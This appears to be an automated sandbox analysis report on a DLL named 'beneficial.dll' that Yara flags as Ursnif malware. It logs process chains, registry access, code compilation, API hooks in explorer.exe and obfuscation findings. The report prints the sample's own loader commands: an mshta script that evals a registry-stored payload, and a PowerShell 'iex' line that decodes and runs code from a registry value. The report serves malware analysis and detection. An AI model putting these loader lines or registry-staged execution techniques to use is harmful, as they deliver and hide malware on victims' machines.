Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\beneficial.dll,Born
Source: beneficial.dll Virustotal: Detection: 7%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\beneficial.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\beneficial.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\beneficial.dll,Born
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\beneficial.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\beneficial.dll,Fitsecond
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\beneficial.dll,Pastput
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bn9l='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn9l).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES7CE2.tmp' 'c:\Users\user\AppData\Local\Temp\kdz1kgtq\CSC3C6C006953954AC2BBB3EA5383F4311.TMP'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>J7aj='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(J7aj).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tangn2aw\tangn2aw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES92FA.tmp' 'c:\Users\user\AppData\Local\Temp\tangn2aw\CSCCFAE70CB50C649DC9230F2DAC50A036.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB25A.tmp' 'c:\Users\user\AppData\Local\Temp\4mppu3lx\CSC5D5E602DFAC54795936F9835A1D78A6E.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCF86.tmp' 'c:\Users\user\AppData\Local\Temp\y3j0hr41\CSC1BD10A2A5D864F59B6883896D7374BCD.TMP'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\beneficial.dll',#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\beneficial.dll,Born Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\beneficial.dll,Fitsecond Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\beneficial.dll,Pastput Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\beneficial.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tangn2aw\tangn2aw.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES7CE2.tmp' 'c:\Users\user\AppData\Local\Temp\kdz1kgtq\CSC3C6C006953954AC2BBB3EA5383F4311.TMP'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES92FA.tmp' 'c:\Users\user\AppData\Local\Temp\tangn2aw\CSCCFAE70CB50C649DC9230F2DAC50A036.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB25A.tmp' 'c:\Users\user\AppData\Local\Temp\4mppu3lx\CSC5D5E602DFAC54795936F9835A1D78A6E.TMP'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCF86.tmp' 'c:\Users\user\AppData\Local\Temp\y3j0hr41\CSC1BD10A2A5D864F59B6883896D7374BCD.TMP'
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: beneficial.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: beneficial.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: beneficial.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: beneficial.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: beneficial.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: beneficial.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: beneficial.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000017.00000002.393718546.000002846EF00000.00000002.00000001.sdmp, csc.exe, 0000001B.00000002.408584301.00000220E4530000.00000002.00000001.sdmp, csc.exe, 00000022.00000002.427307077.0000022082640000.00000002.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.pdbXP source: powershell.exe, 00000015.00000002.534359939.0000024489666000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.pdbXP source: powershell.exe, 0000001A.00000002.543371423.000001DB0CC7E000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.446530652.0000000004E80000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.415578430.00000000058B0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.pdb8 source: powershell.exe, 00000015.00000002.534359939.0000024489666000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.446530652.0000000004E80000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.415578430.00000000058B0000.00000004.00000001.sdmp
Source: Binary string: c:\Did\off\flow-Shoulder\Son\Record.pdb source: loaddll32.exe, 00000000.00000002.484513527.000000006E279000.00000002.00020000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.pdb8 source: powershell.exe, 0000001A.00000002.543279635.000001DB0CC3E000.00000004.00000001.sdmp
Source: beneficial.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: beneficial.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: beneficial.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: beneficial.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: beneficial.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tangn2aw\tangn2aw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tangn2aw\tangn2aw.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E231D62 LoadLibraryA,GetProcAddress, 0_2_6E231D62
PE file contains an invalid checksum
Source: tangn2aw.dll.27.dr Static PE information: real checksum: 0x0 should be: 0x431a
Source: beneficial.dll Static PE information: real checksum: 0xadda3 should be: 0xa6c2b
Source: 4mppu3lx.dll.34.dr Static PE information: real checksum: 0x0 should be: 0xcdb2
Source: kdz1kgtq.dll.23.dr Static PE information: real checksum: 0x0 should be: 0x870d
Source: y3j0hr41.dll.39.dr Static PE information: real checksum: 0x0 should be: 0x1036d
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E232210 push ecx; ret 0_2_6E232219
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E232263 push ecx; ret 0_2_6E232273
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04864EE0 push ecx; ret 0_2_04864EE9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0486528F push ecx; ret 0_2_0486529F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E4EE0 push ecx; ret 3_2_053E4EE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E528F push ecx; ret 3_2_053E529F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063F7E1F push ecx; ret 5_2_063F7E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063F7AB0 push ecx; ret 5_2_063F7AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063FB1DE push esp; iretd 5_2_063FB26C
Source: C:\Windows\System32\control.exe Code function: 42_2_00F0C4ED push 3B000001h; retf 42_2_00F0C4F2

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\tangn2aw\tangn2aw.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.348342609.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.373389445.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370586120.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370648596.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454676310.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.524027105.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348321035.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370736273.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454577691.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370774075.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348246192.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.354947926.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370705290.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.357289358.0000000004E8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.379171921.0000000003CBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348360798.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348388126.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.352157676.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377531681.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348375110.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348299510.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370678028.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454500473.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348273789.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454723611.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370795651.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370752260.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5928, type: MEMORYSTR
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
